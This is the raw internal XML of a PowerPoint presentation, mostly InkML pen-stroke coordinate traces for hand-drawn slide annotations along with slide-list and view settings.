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6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7.xml" ContentType="application/inkml+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide10.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink8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9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0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94" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId63"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId64"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="334" r:id="rId3"/>
    <p:sldId id="338" r:id="rId4"/>
    <p:sldId id="353" r:id="rId5"/>
    <p:sldId id="352" r:id="rId6"/>
    <p:sldId id="339" r:id="rId7"/>
    <p:sldId id="349" r:id="rId8"/>
    <p:sldId id="351" r:id="rId9"/>
    <p:sldId id="350" r:id="rId10"/>
    <p:sldId id="326" r:id="rId11"/>
    <p:sldId id="258" r:id="rId12"/>
    <p:sldId id="327" r:id="rId13"/>
    <p:sldId id="267" r:id="rId14"/>
    <p:sldId id="265" r:id="rId15"/>
    <p:sldId id="310" r:id="rId16"/>
    <p:sldId id="268" r:id="rId17"/>
    <p:sldId id="270" r:id="rId18"/>
    <p:sldId id="314" r:id="rId19"/>
    <p:sldId id="337" r:id="rId20"/>
    <p:sldId id="315" r:id="rId21"/>
    <p:sldId id="355" r:id="rId22"/>
    <p:sldId id="340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35" r:id="rId32"/>
    <p:sldId id="341" r:id="rId33"/>
    <p:sldId id="324" r:id="rId34"/>
    <p:sldId id="325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42" r:id="rId45"/>
    <p:sldId id="301" r:id="rId46"/>
    <p:sldId id="302" r:id="rId47"/>
    <p:sldId id="303" r:id="rId48"/>
    <p:sldId id="304" r:id="rId49"/>
    <p:sldId id="305" r:id="rId50"/>
    <p:sldId id="306" r:id="rId51"/>
    <p:sldId id="308" r:id="rId52"/>
    <p:sldId id="343" r:id="rId53"/>
    <p:sldId id="328" r:id="rId54"/>
    <p:sldId id="329" r:id="rId55"/>
    <p:sldId id="336" r:id="rId56"/>
    <p:sldId id="344" r:id="rId57"/>
    <p:sldId id="346" r:id="rId58"/>
    <p:sldId id="348" r:id="rId59"/>
    <p:sldId id="347" r:id="rId60"/>
    <p:sldId id="345" r:id="rId61"/>
    <p:sldId id="354" r:id="rId62"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6845300" cy="93964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FF9966"/>
    <a:srgbClr val="33CCFF"/>
    <a:srgbClr val="9999FF"/>
    <a:srgbClr val="FF0066"/>
    <a:srgbClr val="999933"/>
    <a:srgbClr val="6699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2" autoAdjust="0"/>
    <p:restoredTop sz="77062" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="63" d="100"/>
          <a:sy n="63" d="100"/>
        </p:scale>
        <p:origin x="244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830" y="-84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FEF89AF-54E3-440D-8ED0-996414AFF8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6017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14T15:34:02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22794 12032 102 0,'-4'-2'103'16,"4"2"-11"-16,-9-4 1 0,4 1-10 0,1 2 3 0,4 1-4 15,-6-7 4-15,2 5-8 0,0 1-5 0,0-3 3 16,4 4 3-16,-8-3-6 0,5 1-1 15,-1-3-1-15,0 2-11 0,0 1 6 0,4 2-8 0,-8-4-4 16,3 1-4-16,-1 3-2 0,-1-3-6 0,4-1-3 16,-4 2-7-16,1 1 0 0,-2-2-3 0,-1 3-4 15,0-1-4-15,-2-2-2 0,-1 3-1 0,2-1 3 16,-3 1-4-16,4 0 2 0,-2 0-1 0,1 1 2 16,3-2-3-16,-2 2-5 0,0-1 5 0,3 0-4 15,0 2 0-15,0-1 0 0,0 0-4 0,1 1-2 16,-1-1 1-16,0 1-3 0,3 2 2 0,-1 0-5 15,-1-1-2-15,-1 3 2 0,0 3 3 0,1-5-6 16,-1 7 8-16,-1-3-5 0,1 4 0 0,-3-3 0 16,0 5 7-16,0-1-11 0,-1-2-2 0,2 3 5 15,-3 0-3-15,4 0-4 0,-2-3 7 0,2 1 0 16,0-2 1-16,1 5-4 0,-2-2 3 0,0 2 0 16,3-1 2-16,-4 1-4 0,2-1 4 0,4-2-1 15,-2 0-1-15,1 0 4 0,2-2-3 0,-1 1-1 16,-1-4 4-16,3 1-4 0,-2 0 4 0,2 1 2 0,-1-2-6 15,0 3 5-15,1-1 3 0,2 0-1 16,-1 1 3-16,0-4-9 0,4 2 5 0,-3-2 1 16,2 4-2-16,0-3-1 0,2 1 4 0,0-1 3 15,1 0-7-15,-2 2 3 0,2-3-1 0,-1-2-1 0,3 5-5 16,-1-4 7-16,-1 1-3 0,4 1 4 16,-1-1 0-16,0-3-5 0,1 5 4 0,2-2-4 15,-2-2 8-15,3 1-3 0,-4-1-1 0,1 1 0 16,3-2 2-16,-2 0-3 0,1 1-1 0,-2 0 3 0,0 0-1 15,2 0-3-15,-2-4 5 0,0 1-3 0,2-1 0 16,-1 2 0-16,0-1 5 0,1 0-1 16,-2 0-1-16,3-2 3 0,-3 1-3 0,2-1 1 15,-1-2 3-15,1 3-4 0,-3-1-1 0,2-2 1 16,1 1 3-16,1-2-3 0,-1 0 1 0,0 1 3 0,-1-2-2 16,1 0-2-16,-3-1 2 0,6 3-8 0,-3-2 9 15,0 0-2-15,-1 0 1 0,0-2-2 0,-1 4 3 16,2-4 1-16,-3 0 4 0,-4 1-4 15,8-2-1-15,-3 2-3 0,-1 0 1 0,1 0 1 0,0 0 2 16,3-1 1-16,-5 0 2 0,-3 3 1 0,3-2-1 16,-1 1 3-16,3 0 5 0,-4 0-4 0,-1 1-1 15,0-3 2-15,-1 2 1 0,3-2 0 0,-5 1 2 16,1 2 1-16,3-3 1 0,-4 0 6 0,3-1-8 16,-3 0-4-16,0-3 3 0,1 5-4 0,0-5 8 15,-1 0-6-15,0 2-1 0,0-1-4 0,-2 1 1 16,2-2 3-16,-2 4-1 0,0-3 2 0,0 0 2 15,0-1-3-15,0 3-3 0,0 0 1 0,0 0-2 16,1 0 2-16,-2 1-1 0,1 0-6 0,0 0 0 16,0-3 2-16,-2 7-4 0,0-5 3 0,2 3 2 15,0 0 0-15,-2-2-4 0,2 0-1 0,-2 3-2 16,-1-4 2-16,1 2-2 0,1 1 0 0,-1-1-3 16,0-1 4-16,0 1 8 0,-1-1-11 0,1 0-4 15,0 2 5-15,-2-1-6 0,1 0 2 0,-1 1 11 16,-1-2-12-16,1 2-1 0,1-2 2 0,-3 4-5 15,2-3 4-15,-4-1-1 0,0 3 0 0,2-2 4 0,-3 1-4 16,4 1 1-16,-2 1 2 0,2 0-2 16,-2-3-1-16,-2 1 2 0,3 2-5 0,-2 0 8 15,3 2-8-15,1-1 13 0,0-1-11 0,-1 1 1 16,5 2-1-16,-5-3-2 0,5 3 0 0,-9-2 1 16,9 2 2-16,-5-1-3 0,5 1 6 0,-5-2-2 15,5 2-5-15,-7-1 2 0,7 1-1 0,0 0-3 16,-5-3-7-16,5 3-16 0,-6-3-25 0,1 3-29 15,-1-3-39-15,0 2-42 0,6 1-56 0,-14-4-41 16,4 1-203-16,-1 1-500 0,-3-2 221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14T16:00:09.0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3912 4139 22 0,'-1'-5'85'0,"0"-2"6"0,-1 1 1 0,1-1 10 15,1 0-11-15,-2 2 16 0,2-2 16 0,-3 1-7 16,0 0 0-16,1 1-2 0,1 0-6 0,-2 1-1 16,1 1-4-16,-1-1-5 0,1 1-12 0,-1-3-6 15,3 6-7-15,-5-2-9 0,1 0-7 16,4 2-3-16,-6-3-9 0,6 3-8 0,0 0-7 0,-5 0 0 15,5 0-3-15,0 0-3 0,-7 10-5 0,5-1-1 16,-2 2-4-16,0 4-1 0,1 1-3 0,2 1-1 16,1-1-4-16,1 0-2 0,2-6-2 15,1 2-6-15,0-3 2 0,1 2-1 0,1-4-1 0,4 2-1 16,-1-3 4-16,2 1 0 0,-1-3-6 0,0-1 6 16,-1-3 3-16,6 0-3 0,-8 2 3 0,-1-2 2 15,-6 0-2-15,14-2 6 0,-10 1 16 0,1-1 14 16,-1-1-1-16,-3 0-3 0,-1-5-10 0,0-1-1 15,0-3-4-15,-5-3-2 0,-3-1 10 16,2 1-7-16,-3-1-2 0,-3 0-8 0,1 3 0 0,0 1-2 16,0 1-1-16,0 2 2 0,2 2-3 0,0 0-7 15,1 0-15-15,1 4-30 0,3 0-39 0,0-2-53 16,0 2-35-16,0 0-13 0,4 3-115 0,0 0-327 16,0 0 144-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="575.9854">4408 3646 5 0,'0'0'85'0,"-4"-4"-11"16,4 4-8-16,-5-1-5 0,5 1-11 0,0 0-1 15,-9 5-6-15,4 0-3 0,0 5-4 0,-3 6-11 16,-3 5-2-16,2 5 5 0,1-1 1 0,2 0-5 0,-2 2-5 16,2 2 3-16,3 0-1 0,2 0 0 0,-3 0 1 15,3 0-9-15,-2-2 8 0,2-1-15 0,0-7 7 16,-1 3 5-16,4-5-4 0,-2 0-3 15,0-6-5-15,0 0 7 0,0-1-7 0,1-4 2 16,-1 0 1-16,0 0-6 0,0-2 1 0,-1-1 4 16,1-3 8-16,1 6-2 0,-1-6 5 0,0 0-4 0,0 0-4 15,0 0 0-15,0 0-10 0,-3-16-6 0,3 7 7 16,-1-1 3-16,-1 0-17 0,2 0 10 0,-3-3 6 16,2 3-6-16,-2-3 7 0,2 1-1 15,0 6-20-15,0-2 20 0,1 2 3 0,0 0-2 16,0 0-13-16,-2 1 0 0,5 0 2 0,-2 2 4 15,4-1-12-15,-1 1 16 0,2 3-10 0,1-3 2 0,1 3 2 16,0 1 10-16,1-1-17 0,2 2 8 0,-1 1-5 16,-1-1 6-16,1 0-6 0,-4 4 9 15,3-5-6-15,-5 2 4 0,4-1-7 0,-6-1 4 16,1 2 6-16,2 0-3 0,-5-3-11 0,5 5 12 16,-4-4 1-16,-1-1 0 0,0 0 16 0,-1 6 1 15,-5 1-6-15,-3-1 5 0,-7 3-4 0,-3 0 2 0,0 2 3 16,1-3-8-16,0-3 1 0,0 2 0 15,4-4-10-15,4 3-4 0,4-4-18 0,-3 0-17 16,4-2-28-16,1 1-22 0,4-1-47 0,0 0-144 16,0 0 64-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="851.6211">4579 4109 15 0,'-1'18'75'0,"1"8"-2"0,-5 4 8 0,1 1-1 16,-1-3-6-16,-3 0-5 0,3-1-1 0,-6 3-4 15,5-1-14-15,-4 2-1 0,0-2-4 0,3-5-8 16,-1-5 2-16,-1-1-9 0,0 6-5 0,0-7 8 15,0-1-15-15,-1-2-1 0,4-5 4 0,-2 1 1 16,0-3-11-16,2 1-22 0,-3-2-14 0,0-3-9 16,4-1-16-16,-3-2-10 0,-2-1 2 0,2-3-7 15,3-4-51-15,-5-2-125 0,2-4 56 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1942.7768">4822 4324 41 0,'9'-1'102'0,"-1"-2"-5"0,1-2 2 15,2 0-6-15,0 1-5 0,0-1 6 0,-2-1 4 16,4-4-8-16,-3 2 5 0,1 1 2 0,-1-2 1 16,-1 1-9-16,1-2-2 0,-5 0-8 0,1-3-8 15,-2 4-6-15,-1-4-3 0,-1 2 1 16,-2 2-2-16,0-4-7 0,-2 4-5 0,-4-1-8 0,3 4-2 15,-4-1-11-15,1-1 1 0,-3 4-7 0,3 0-5 16,-1 1-2-16,-3 3-3 0,-2 1 0 0,0 4-6 16,-1-1-2-16,-4 6-2 0,2 4-3 0,-6 3 2 15,4 1-5-15,5-3-11 0,3 1-25 0,1-2-17 16,3-1-1-16,3 2-6 0,0-2-1 0,2 0-5 16,3-3-8-16,2 0 2 0,4-1 5 0,-1 1-7 15,-1-1 16-15,5-6 4 0,2 3 12 0,1 1-3 16,7-7-1-16,-3 1 9 0,3-1-3 0,0-3 11 15,-1-2 2-15,7-1 10 0,-2 0-3 16,1-4 1-16,-3 0 4 0,3-1 6 0,-4-2-5 16,2 3 6-16,0-3 11 0,-1-1-17 0,0-1 0 15,-7 4 10-15,0-1 7 0,-2 0 2 0,-5 3 15 0,-1 3 13 16,0-3 25-16,0 4 6 0,-4 2 12 0,-2-2-1 16,-1 2-5-16,1-1 2 0,-2 0-5 0,-1 4-13 15,-4-5-7-15,4 5 0 0,-6-3-11 16,-7 2 3-16,4 2-5 0,-1 0-8 0,-4 1-1 15,1 3-2-15,-1 0-2 0,1 1-4 0,2-1-2 0,-2-2 4 16,3 4-10-16,1 0-1 0,0-1-9 0,4 2-7 16,0-2-9-16,-1 1 1 0,3-1-12 0,1 0 3 15,1 1-4-15,1 0 2 0,1-3-8 0,-1 4 2 16,3-4 9-16,-1 3-1 0,2-3-1 16,2 1-11-16,-1 1 1 0,5-1 8 0,-3 0 9 15,2-1-5-15,-1 1 4 0,2-1-6 0,-1-1-11 0,0 1 6 16,0 1-1-16,0-2 3 0,0 1 4 0,0-4-14 15,-3 2 2-15,2 0-1 0,2-2 11 0,3 3-4 16,-5-3 11-16,2-1-5 0,4-2-3 16,-2 0 6-16,4-4-5 0,-2-3 7 0,3 1-9 15,-3-4 8-15,2 1-14 0,2-8 8 0,1 1 1 16,-6 3 4-16,5-7 0 0,-5 7 12 0,1-7-2 0,-1 0 3 16,-3-2 5-16,3 1 0 0,0 0 4 0,-3 1 7 15,-1 6 2-15,-3-1 7 0,1 3-3 0,-3 4 10 16,0 1 22-16,-2 3-10 0,0 1 10 15,0 1-7-15,0 1-6 0,-1 0 0 0,1 1-6 16,-2 3-4-16,0 0-3 0,0 0 5 0,0 0-10 16,-3 12 12-16,-2 2 3 0,-5 11 1 0,2 1-5 0,0 3 3 15,1 1 0-15,-2-2 0 0,4 1-13 0,1-3 12 16,0 0-14-16,1 2 8 0,2-4-2 0,0-5-3 16,0-3-3-16,1-3-6 0,1-3-6 15,-1 1-14-15,1-2-9 0,0 3-5 0,-1-8-19 16,2 3 1-16,-1-1 5 0,-1-4 8 0,0-2 1 15,0 0 2-15,0 0-10 0,0 0 2 0,0-15 5 16,0 7-28-16,-1-3-69 0,-2-6 31 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2092.3771">5469 4120 45 0,'-13'-16'3'16,"4"0"16"-16,-5 3 6 0,5 4 12 0,2 0 8 16,-2 2 23-16,1 1-12 0,3 0-3 0,1 2-13 15,1 2-7-15,1 0-2 0,2 2-6 0,-3-3 4 16,3 3-1-16,0 0 23 0,0 0 21 0,17 8 14 15,0-1 0-15,1-2-1 0,7 5 2 0,3-1-19 16,4 0-9-16,3 1 1 0,-2-2-6 0,1 1-18 16,2 0-41-16,2 1-55 0,1 0-143 0,-3 1-220 15,-3 0 98-15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19T13:49:53.5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15023 7567 10 0,'5'1'12'0,"2"1"-3"0,-7-2 6 16,10 0-1-16,-10 0 0 0,10 0-7 0,-10 0-6 15,7 0 6-15,-7 0-7 0,5 0-6 0,-5 0-9 0,4 2-14 16,-4-2 6-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="20672.4583">14172 9867 2 0,'0'0'18'16,"-1"-4"-1"-16,1 4-5 0,0 0 1 0,0 0-3 15,0 0-8-15,0 0-3 0,-4-4-5 0,4 4-6 16,0 0-12-16,0 0 6 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="67175.8328">20160 11059 58 0,'5'25'94'0,"-3"3"15"16,1-1-1-16,-3 2-7 0,2 2 6 0,-3 3-5 15,1-2 1-15,-4 0-8 0,2 2 1 0,-3 0 6 16,1-2 1-16,-1 3 16 0,-3 1 1 0,-4 9-11 15,0-14-8-15,-1 1-14 0,-2 0-5 0,-2 1 0 16,-1-5-9-16,4 1-1 0,-4-5-9 0,4 0-8 16,-4-2-5-16,-1 0-4 0,0-1-4 0,0-4-4 15,-4 0-4-15,0-1-34 0,-3-4-52 0,-3 1-99 16,-8-2-207-16,0-3-389 0,-15-4 172 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="98076.4099">20221 11104 28 0,'0'0'23'0,"0"0"-6"16,0 0-9-16,-8 4-12 0,8-4-8 0,0 0-13 15,-3 5 5-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="140455.4402">2501 6167 1 0,'-3'-2'22'0,"0"0"1"0,3 2-5 16,-4-6 0-16,4 6 0 0,-1-4 5 0,1 4-2 15,-4-5-2-15,4 2-8 0,0 3 1 0,-5-4 4 0,5 4-2 16,-4-5 3-16,3 3-5 0,1 2 1 16,-4-3-1-16,4 3 5 0,-4-4-7 0,4 4-1 15,-4-4-1-15,4 4-2 0,-5-3 0 0,4-2 0 16,1 5-2-16,-4-2-3 0,4 2 5 0,-6-2-3 15,2 0 2-15,4 2-2 0,-9-4-3 0,5 1 1 16,-1 1-2-16,0-1 1 0,-4 1 6 0,1 2-5 16,1 0-2-16,-2 0 5 0,9 0-3 0,-14 0 1 15,7-2-4-15,-4 2 1 0,2 0 3 0,-1 2-2 0,-3-2-1 16,4 1 3-16,-1 0 2 0,-3 2-2 0,7-2-7 16,-5 0 5-16,1 3-4 0,4-1 3 15,-1-2-3-15,2 1 6 0,0-1-5 0,-4 0 2 16,4 0-2-16,-3 2 9 0,3 0-9 0,0-1 8 15,0-1-5-15,-1 2-3 0,0-2 5 0,3 2-4 0,-3-3 4 16,6 0-1-16,-7 3-8 0,3-1 6 0,4-2 1 16,-10 4 3-16,6-1-2 0,0-1-5 15,0 0 1-15,0 1 4 0,-2 0-2 0,2-1 1 16,-1 0 0-16,3 1 0 0,-4 0 3 0,3-1 0 0,-1 0-6 16,0 1 5-16,-1-1 2 0,2 0-4 0,3-2-2 15,-7 4 2-15,4-1-3 0,-1 0 4 16,2-1 1-16,-1 1-3 0,-1 0 2 0,1 0-8 0,0-1 12 15,-1 3-7-15,3-1 2 0,-3-1-1 0,0 1-1 16,3 0 2-16,-3 0 3 0,3 0-3 0,-2 0 1 16,-2 1 1-16,4 0-8 0,-3 1 5 0,4 0 2 15,-4 0 2-15,3 0-3 0,-2-2 3 0,2 4-8 16,0-1 5-16,-2-2-2 0,2 3 4 16,-3-3-1-16,4 0-3 0,0 1 2 0,-3 1 3 0,3-4-3 15,-1 3 0-15,1-1 1 0,0 0 1 0,0-1 0 16,0 2-7-16,0-2 4 0,0 1 2 0,0-1-4 15,0 3 3-15,0-3-1 0,0 1 0 16,1 1-2-16,-1-2 3 0,0 1-3 0,3-1 3 16,-3 0 5-16,0-1-5 0,1 2-2 0,2 0 1 0,-3-3 2 15,1 2-4-15,-1-1 4 0,3 3-2 0,-2-2-2 16,0-1 6-16,3-2-6 0,-4 4 4 0,4-2-3 16,-3 0-1-16,2 1-1 0,2-3-6 0,-4 5 14 15,3-3-1-15,1 1-5 0,-2-1 4 0,2 0-2 16,-1-1 3-16,1 1-3 0,1 0 0 0,-1 0 3 15,0-1 2-15,0 1 1 0,2-3-7 0,0 3-4 16,-1-1 13-16,1 0-2 0,0-2-1 0,2 2-1 16,1-2 2-16,-1 1-1 0,1-1-3 15,1 1-1-15,1-1 4 0,-1 0 1 0,2 0-2 0,0 0 3 16,1-1-4-16,-1 0 3 0,1-1-3 0,0 2 2 16,-3-2 3-16,4 0-3 0,-3-1 2 0,4 0-3 15,-3 1 1-15,0-2 1 0,0 0 4 0,1 1-5 16,-1 0-2-16,-2-1 1 0,1-2-7 0,1 3 6 15,-3-1-4-15,0-1 0 0,2-2 1 0,1 3 3 16,-4-1-3-16,0-3 6 0,-3 4-3 0,4-1 0 16,-2-2-2-16,0 1 4 0,-1-1 1 0,0 1 5 15,-2-1-1-15,-1 1-5 0,1-1-3 0,0-2 6 16,-2 2 3-16,3-2-7 0,-3 0 9 0,1-2 2 16,-1 3-8-16,0-3-2 0,0 1 4 0,0-2 6 15,-2-1-6-15,1 1 5 0,0-5-8 0,0 3 1 16,-2-4 0-16,-2 4-2 0,2-1 2 0,0-2-3 15,0 2 2-15,-1 4 2 0,-2-2 4 0,2 3-4 16,-2-4-15-16,2 3 9 0,-1 0 3 0,-2-1-3 16,2 0-2-16,-2 1-1 0,1 2 8 0,0 2-6 15,-1-1 1-15,1-1 5 0,0 2-13 0,0 2 7 16,1-1 0-16,-2 2-3 0,1-1-13 0,0 2-13 16,-3 1-6-16,6 2-9 0,-12 0-6 0,3 4-5 15,-4 2-29-15,3 1-89 0,-4 5 40 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="141979.6078">2146 10904 8 0,'-5'-4'15'0,"0"1"6"16,0 3-3-16,0-3-3 0,0 0-2 0,-3-2-3 15,2 4-1-15,-1-1 1 0,-1 1 1 0,2 0-1 0,-4 0-4 16,4 1 2-16,-1-2 2 0,-2 4-8 0,0-2 4 15,9 0-1-15,-11-2-2 0,4 2 2 0,7 0 1 16,-11 0-3-16,11 0 0 0,-7 0-4 0,7 0 2 16,0 0 1-16,-6 2-1 0,6-2 0 0,0 0-4 15,-8 1 8-15,8-1-10 0,-5 4 7 0,4 0-3 16,-3-1 4-16,2 0-1 0,-1 2-2 0,1 3 1 16,-1 0-1-16,0 2 1 0,-1 0 1 0,3 3 0 15,-4-2 1-15,1 1-8 16,1 4 6-16,0 0-3 0,0-3 0 0,1 2 4 0,2 2-2 0,-1-1-2 15,-1 1 7-15,1-2-10 0,1 1 0 0,0 0 7 16,0 0-5-16,0 0 3 0,1 1-2 0,1-1 7 16,0-6-10-16,1 8 7 0,-1-7 1 0,2 0-3 15,-2 0-3-15,4-1 2 0,-3 1-3 16,1 0 5-16,-1-4-2 0,2-1-4 0,-2 1 4 0,1-2 0 16,-1 2-2-16,4 0 2 0,-4-3 0 0,4-1-1 15,-2 4 2-15,-1-2 2 0,2-2-1 0,-1-1 1 16,3 1-1-16,-3-1 4 0,3 0 6 0,1 0-7 15,1-2 3-15,-1 0-4 0,4 0 10 0,-4-4 2 16,1 0 1-16,4 1-2 0,0-6 4 0,1 0-9 16,2-2 6-16,-1 2-2 0,-1-4 7 0,1 2 2 15,-3-3-5-15,1 1 6 0,-4-1-3 0,3-1-4 16,1-1 6-16,-5-1-7 0,8-5 2 0,-8 5-8 16,1-5 8-16,1-1-10 0,-2 6 2 0,-2 0 5 15,-2 0-2-15,1 1 1 0,-3 3 9 0,-1 2-3 16,-1-1 0-16,2 2 2 0,-4-1-6 0,-2 0-4 15,1 1 3-15,-1 0-5 0,-3 1 8 0,1 0-6 16,-3 1-3-16,-1-1 2 0,-1 0 1 0,1 3-1 16,-4-3-1-16,-2 2-3 0,-2 0-1 0,-2 2 9 15,1 2-10-15,0-2 4 0,-1 2-2 0,0 2 4 16,0-2-7-16,1 2-1 0,1 0-4 0,2 1 11 16,5-2-13-16,-2 2 8 0,6 0-1 0,-2-2-10 15,3 2-18-15,5 0-1 0,-8 0-13 0,8 0-9 16,0 0-7-16,-10 0-8 0,10 0-37 0,0 0-106 15,0 0 47-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="144067.6891">2059 11763 1 0,'0'0'4'0,"0"0"-4"0,0 0-2 0,0 0 0 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="144078.6602">2059 11763 2 0,'0'0'-1'0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="186348.2915">1783 3869 70 0,'-19'29'66'0,"-3"15"-3"16,-1 3-6-16,0 6-10 0,-7 25-1 0,7-21-5 16,-5 26-3-16,-3 3-2 0,2 5-5 0,2 8 3 15,5 3-5-15,-5 5 9 0,3 5-4 0,0 0-8 16,-1 4-6-16,6 8 10 0,-5 5-2 0,2 7 5 15,-1-1-1-15,-4 6 5 0,3 6 10 0,1 8 6 16,2 7 7-16,0 3 1 0,-5 0-7 0,7 6 5 16,2 3-9-16,2 5-4 0,1-1-5 0,1 0-3 15,2 2 5-15,8 0-6 0,1-3 1 0,-4 10 1 16,8 5 1-16,-2-3-3 0,1-3-5 0,0 8-1 16,6-2 1-16,-3 1 10 0,-4-4-1 0,0-1-3 15,3-1 2-15,2-4-6 0,-2-2-3 0,0-7-6 16,-1 1 1-16,1-5-2 0,-1-3-5 0,2-4-5 15,-4-6-1-15,1-1 2 0,2-8-4 0,-7-7 3 16,-1-6-6-16,1-8-2 0,0-7-1 0,-3-2 3 16,4-9 0-16,1-4-4 0,-2-5 1 0,1-11-2 15,-2-6-1-15,2-28-1 0,1-2-1 0,-1 1 3 16,3-3-1-16,-5 0 6 0,5-17-11 0,0-2-7 16,3-4-9-16,-6-9-19 0,6-2-15 0,-6-4-2 15,2-6-4-15,1-1-10 0,0-6-21 0,0 0-46 16,0-14-130-16,-1-14-287 0,1-18 127 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="208378.8179">575 3368 5 0,'-34'-2'21'0,"7"2"14"16,4 0 0-16,4-1 3 0,6 1 16 0,1-2 8 16,1 0-13-16,3 2 0 0,3-1 4 15,-2 1-7-15,7 0 2 0,-8-3-17 0,4 3 0 16,4 0-1-16,0 0-3 0,0 0-10 0,0 0-4 0,0 0 9 16,23-6-9-16,-1 4 3 0,5-1 0 15,6 3-6-15,22-4 4 0,3 1-3 0,4 3 6 16,30 2-10-16,-27-2 1 0,34 2 1 15,-1-1 7-15,3 2-4 0,-1 1-1 0,11 0 2 0,9-2-9 0,1 0 1 16,10-1 5-16,3 2-4 0,4-1-1 0,7-1-2 16,-1 1 5-16,13-1 1 0,-5 3 0 0,-1 0-5 15,-3-2 6-15,0 1-13 0,-4 3 11 16,0-3-8-16,-3 2 17 0,-9-4-8 0,-4 8-6 16,-13-3-4-16,-5 2 1 0,-8 0 6 0,-4 1 3 15,-33-5-7-15,-1 2 8 0,-3 0-6 0,-1 1-3 0,-5 0 0 16,-15-1 3-16,-3 0-7 0,-3 0 1 15,-3 2-18-15,-3-3-19 0,-9 2-19 0,-6-1-20 16,-4-2-53-16,1 5-141 0,-7-3 62 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="208656.3112">1272 3889 57 0,'-18'112'84'0,"4"-4"-14"16,5 0-3-16,4 0-17 0,1 6-24 0,-2 2-8 16,5-1-10-16,1 4-19 0,0 1-21 0,2-6-25 15,1 0-60-15,3-6 26 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="209459.6583">4371 4078 3 0,'3'4'34'0,"1"-1"8"0,2 0 2 0,-1 0 2 16,5-1-1-16,-1 0 2 0,0 1-4 0,5 0-7 0,-1-3-4 15,4 0 11-15,1-5 1 0,1 2-10 16,-2-3-1-16,3 1 0 0,1-3 0 0,1 0 2 15,-4-2-1-15,0 0 0 0,-4 1-2 0,4 0 4 16,-9 1 0-16,0 1 12 0,0-2-7 0,-3 2 8 16,-3 1-1-16,3-3-7 0,-3 2-4 0,1-2-8 15,-4 4-3-15,1-3-2 0,-1-1 3 0,-1 3-5 16,-3-2 0-16,0-2-9 0,-1 5 5 0,0-2 4 16,-5 2-5-16,-1 2-20 0,-2-2 6 0,-1 1-2 15,-1 2 4-15,-5 2-3 0,-1 0 5 0,3 2-2 16,0 0 11-16,0 3-21 0,2 0 14 0,0 2-17 0,4 0 12 15,1 0-9-15,0 5-13 0,2-2 12 16,0 3 7-16,0 1-9 0,4-2 11 0,1 1-5 16,3 3 3-16,1 3-8 0,0-2 9 0,1-1-1 15,8 0-10-15,-4 0 9 0,4 0-7 0,2-1-3 16,0 1 8-16,-1 1-5 0,5-4-17 0,0 0-12 16,1 0-15-16,-3 1-3 0,0-1-8 0,1-3-11 15,-1 2-15-15,-2-6-55 0,1 1-156 0,-1 0 70 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="209719.6092">5137 3950 11 0,'0'0'126'0,"0"0"-10"16,0 0-17-16,0 0-7 0,-22 5-24 0,9-1 8 16,-1 3-15-16,-5 5-2 0,-7 1-7 0,2 3 2 15,-1-2-10-15,2 3 1 0,2-2-10 0,3 0-4 16,7-1-6-16,-3 0-3 0,2 0-2 0,1 0-7 16,3-4-15-16,2 1-23 0,-1-3-8 0,2 3-14 15,0-5-9-15,4 1-9 0,-3-1-8 0,1-2-52 16,2-2-136-16,1 4 61 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="209963.9284">4844 3950 61 0,'0'0'65'0,"9"5"-6"0,-4-3-12 16,4 4-3-16,0 1-2 0,1 0-6 0,-1-1-1 16,7 6 1-16,-3-2-3 0,3 1 2 0,-2 5-10 15,-1-2 9-15,3-1-8 0,2 4-4 0,-2-1 3 16,-1 3-1-16,1 1-3 0,-4-5-8 0,2 1-17 16,-5-3-16-16,0-1-11 0,-1 1-10 0,-2-2-13 15,2 1-36-15,-4-2-96 0,1-1 44 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="210179.8164">5325 4157 9 0,'0'0'138'0,"0"0"-6"0,0 0-7 16,0 0-6-16,5-1-7 0,-5 1-21 0,0 0-12 16,0 0-23-16,0 0-11 0,0 0-8 0,0 0-25 15,9 3-11-15,-5 2-13 0,2-3-21 0,-1 2-17 16,0 0-15-16,3 3-68 0,1-3-144 0,-3 0 64 16</inkml:trace>
